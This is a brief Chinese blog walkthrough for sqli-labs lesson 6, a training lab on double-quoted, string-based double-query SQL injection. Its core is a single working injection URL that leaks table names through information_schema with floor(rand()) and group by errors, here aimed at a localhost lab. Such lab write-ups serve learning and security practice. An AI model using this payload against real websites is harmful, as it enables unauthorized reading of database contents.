【sqli-labs】 less6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

同less5

单引号改成双引号就行

http://localhost/sqli/Less-6/?id=a" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*9))as a from information_schema.tables group by a%23

【sqli-labs】 less6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

上一篇:Java中的数据结构及排序算法


下一篇:linux下安装QT过程